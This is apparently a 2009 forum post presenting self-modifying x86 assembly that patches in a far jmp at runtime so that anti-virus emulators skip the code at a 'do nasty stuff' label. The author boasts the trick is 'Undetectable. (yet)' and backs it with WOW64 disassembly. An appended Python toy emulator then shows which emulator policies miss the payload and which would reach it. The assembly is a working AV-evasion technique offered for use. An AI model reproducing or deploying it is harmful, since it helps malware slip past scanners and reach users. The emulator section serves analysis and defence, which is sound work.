
AV Emulators not able to handle far jmp, yet.


int0
February 2nd, 2009, 16:13
So here is another bug in AV emulators. I have tested this code on most AV emulators and none of them was able to handle it properly.
Code:

jmp get_jump_address
go_back:
mov eax, [esp]                 ; eax = return address pushed by the call = start of the placeholder bytes
xor ecx, ecx
mov cl, 8                      ; skip far jmp (7 bytes) and ret (1 byte)
add ecx, eax                   ; ecx = address of continue_here
mov byte ptr [eax], 0EAh       ; write far jmp opcode
inc eax
mov dword ptr [eax], ecx       ; write 32-bit offset (continue_here)
add eax, 4
mov cx, cs
mov word ptr [eax], cx         ; write current code segment selector
ret                            ; return onto the freshly written far jmp
get_jump_address:
call go_back                   ; pushes the address of the placeholder below
db 90h                         ; becomes 0EAh - jmp far ptr16:32
dd 90909090h                   ; becomes the offset (continue_here)
dw 9090h                       ; becomes the segment (cs)
; AV emulators will skip this far jmp or
; are not able to handle it at all
ret                            ; only reached by an emulator that skips the far jmp
continue_here:
; do nasty stuff
xor eax, eax
ret

I borrowed this idea from WOW64.

How it looks in Vista64:
Code:

cs = 0023
7EFA008B FF15 0020FA7E call near dword ptr [7EFA2000] = 75ED31B0
75ED31B0 EA 3736ED75 3300 jmp far 0033:75ED3637 ; continue in wow64cpu.dll

.text:0000000078BC3637 mov r8d, [esp+0]
.text:0000000078BC363C mov [r13+0BCh], r8d
.text:0000000078BC3643 add esp, 4
.text:0000000078BC3646 mov [r13+0C8h], esp
.text:0000000078BC364D mov rsp, r14
.text:0000000078BC3650 and qword ptr [r12+1480h], 0
.text:0000000078BC3659 mov r11d, edx
.text:0000000078BC3659 sub_78BC3637 endp ; sp-analysis failed
.text:0000000078BC3659
.text:0000000078BC365C ; Exported entry 25. TurboDispatchJumpAddressStart
.text:0000000078BC365C
.text:0000000078BC365C ; =============== S U B R O U T I N E =======================================
.text:0000000078BC365C
.text:0000000078BC365C
.text:0000000078BC365C public TurboDispatchJumpAddressStart
.text:0000000078BC365C TurboDispatchJumpAddressStart proc near ; DATA XREF: CpuProcessInit+156o
.text:0000000078BC365C ; CpuProcessInit+169o ...
.text:0000000078BC365C jmp qword ptr [r15+rcx*8]
.text:0000000078BC365C TurboDispatchJumpAddressStart endp


Conclusion:
[+] Small and generic code.
[+] Undetectable. (yet)
[-] Write access rights for code section.
[-] Can be fixed very soon.

Correction:
It seems this trick works only on x64 systems, and it looks like AV emulators behave differently on x86 and x64 systems.
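As an added example (not code from int0's post), the toy emulator below runs a hand-assembled encoding of the snippet above and shows the two failure modes the post describes next to the correct behaviour: "skip" treats the 7-byte `EA` far jmp as a nop and falls onto the trailing `ret`, "abort" gives up at it, and "follow" decodes the ptr16:32 operand and lands on `continue_here`. The byte encoding of the snippet, the flat 64 KiB address space, the load address and the stack layout are my assumptions; the 0x23 selector is the `cs = 0023` shown in the post's Vista64 dump. Only the opcodes the snippet needs are implemented.

```python
"""Toy x86-32 emulator for the far-jmp trick in the post above (added example, not
code from the original post).  SNIPPET is my own hand-assembled encoding of the
posted snippet; the flat 64 KiB address space, load address and the 0x23 selector
(the post's "cs = 0023") are assumptions.  Policies for the EA opcode: "follow"
decodes ptr16:32 and continues at its target (the fix), "skip" treats it as a
7-byte nop, "abort" gives up at it."""
import struct

M32 = 0xFFFFFFFF
CODE_BASE, STACK_TOP = 0x1000, 0xF000      # assumed layout inside a flat 64 KiB space
EXIT_ADDR = 0xDEADC0DE                     # fake return address that ends the run
USER_CS = 0x0023                           # 32-bit user code selector from the post

# Hand-assembled 32-bit encoding of the posted snippet (constructed here).
SNIPPET = bytes.fromhex(
    "EB19" "8B0424"               # 0000 jmp get_jump_address   0002 go_back: mov eax, [esp]
    "31C9" "B108" "01C1"          # 0005 xor ecx, ecx   0007 mov cl, 8   0009 add ecx, eax
    "C600EA" "40" "8908"          # 000B mov byte ptr [eax], 0EAh   000E inc eax   000F mov [eax], ecx
    "83C004" "668CC9" "668908"    # 0011 add eax, 4   0014 mov cx, cs   0017 mov word ptr [eax], cx
    "C3" "E8E2FFFFFF"             # 001A ret   001B get_jump_address: call go_back
    "90909090909090" "C3"         # 0020 far jmp placeholder (db/dd/dw of 90h)   0027 ret
    "31C0" "C3"                   # 0028 continue_here: xor eax, eax   002A ret
)
CONTINUE_HERE = CODE_BASE + 0x28           # where the "nasty stuff" lives

class Fault(Exception): pass               # unmapped memory or an unimplemented encoding
def sx(b): return int.from_bytes(b, "little", signed=True)   # sign-extended immediate
def ux(b): return int.from_bytes(b, "little")                # unsigned little-endian value

# opcode pattern -> (immediate length, handler); only what the snippet needs.
OPS = {
    b"\x90":         (0, lambda c, i: None),                                        # nop
    b"\xEB":         (1, lambda c, i: c.set("eip", c.eip + sx(i))),                 # jmp rel8
    b"\xE8":         (4, lambda c, i: (c.push(c.eip), c.set("eip", c.eip + sx(i)))),  # call rel32
    b"\xC3":         (0, lambda c, i: c.ret()),                                     # ret
    b"\x8B\x04\x24": (0, lambda c, i: c.set("eax", ux(c.read(c.esp, 4)))),          # mov eax, [esp]
    b"\x31\xC9":     (0, lambda c, i: c.set("ecx", 0)),                             # xor ecx, ecx
    b"\x31\xC0":     (0, lambda c, i: c.set("eax", 0)),                             # xor eax, eax
    b"\xB1":         (1, lambda c, i: c.set("ecx", (c.ecx & ~0xFF) | i[0])),        # mov cl, imm8
    b"\x01\xC1":     (0, lambda c, i: c.set("ecx", c.ecx + c.eax)),                 # add ecx, eax
    b"\xC6\x00":     (1, lambda c, i: c.write(c.eax, i)),                           # mov byte ptr [eax], imm8
    b"\x40":         (0, lambda c, i: c.set("eax", c.eax + 1)),                     # inc eax
    b"\x89\x08":     (0, lambda c, i: c.write(c.eax, struct.pack("<I", c.ecx))),    # mov dword ptr [eax], ecx
    b"\x83\xC0":     (1, lambda c, i: c.set("eax", c.eax + sx(i))),                 # add eax, imm8
    b"\x66\x8C\xC9": (0, lambda c, i: c.set("ecx", (c.ecx & 0xFFFF0000) | c.cs)),   # mov cx, cs
    b"\x66\x89\x08": (0, lambda c, i: c.write(c.eax, struct.pack("<H", c.ecx & 0xFFFF))),  # mov word ptr [eax], cx
    b"\xEA":         (6, lambda c, i: c.far_jmp(*struct.unpack("<IH", i))),         # jmp far ptr16:32
}

class CPU:
    def __init__(self, policy):
        self.policy, self.running, self.trace = policy, True, []
        self.mem = bytearray(0x10000)
        self.mem[CODE_BASE:CODE_BASE + len(SNIPPET)] = SNIPPET
        self.eip, self.cs, self.eax, self.ecx, self.esp = CODE_BASE, USER_CS, 0, 0, STACK_TOP
        self.push(EXIT_ADDR)                       # "returning" here ends the run
    def read(self, addr, n):
        if not 0 <= addr < len(self.mem): raise Fault(f"unmapped address {addr:#010x}")
        return bytes(self.mem[addr:addr + n])
    def write(self, addr, data):
        if not 0 <= addr < len(self.mem): raise Fault(f"unmapped address {addr:#010x}")
        self.mem[addr:addr + len(data)] = data
    def set(self, reg, value): setattr(self, reg, value & M32)
    def push(self, value):
        self.set("esp", self.esp - 4)
        self.write(self.esp, struct.pack("<I", value & M32))
    def ret(self):
        self.eip, self.esp = ux(self.read(self.esp, 4)), self.esp + 4
        self.running = self.eip != EXIT_ADDR
    def far_jmp(self, off, sel):
        if self.policy == "follow":
            if sel != self.cs:      # a selector switch (WOW64's 0033) is not modelled here
                raise Fault(f"far jmp to unhandled selector {sel:#06x}")
            self.eip = off
        elif self.policy == "abort":
            self.running = False
        # "skip": the 6 operand bytes were consumed, so execution resumes after the far jmp
    def step(self):
        """Decode from memory on every fetch, so the self-patched bytes are seen."""
        self.trace.append(self.eip)
        for n in (3, 2, 1):                        # longest pattern first
            key = self.read(self.eip, n)
            if key in OPS:
                imm_len, handler = OPS[key]
                self.eip += len(key)
                imm = self.read(self.eip, imm_len)
                self.eip += imm_len                # eip now points at the next instruction
                handler(self, imm)
                return self.running
        raise Fault(f"unsupported encoding at {self.eip:#010x}")

def run(policy, max_steps=100):
    cpu = CPU(policy)
    while cpu.step():
        if len(cpu.trace) > max_steps: raise Fault("runaway emulation")
    return cpu

def reached_payload(policy):                   # did the emulator ever fetch from continue_here?
    return CONTINUE_HERE in run(policy).trace
```

`reached_payload("follow")` is true while `reached_payload("skip")` and `reached_payload("abort")` are false; in the "skip" run the last fetched instruction is the `ret` at offset 27h, so the emulator finishes "cleanly" without ever seeing the payload, which is exactly why a scanner built on it reports nothing. Two details in the toy matter for a real emulator as well: `step` re-reads memory on every fetch instead of working from a decoded copy, otherwise the `0EAh` patch is invisible, and "follow" only accepts a jump within the current selector; the WOW64 `0033` switch in the post's dump is a mode change the toy refuses with a `Fault` rather than guessing.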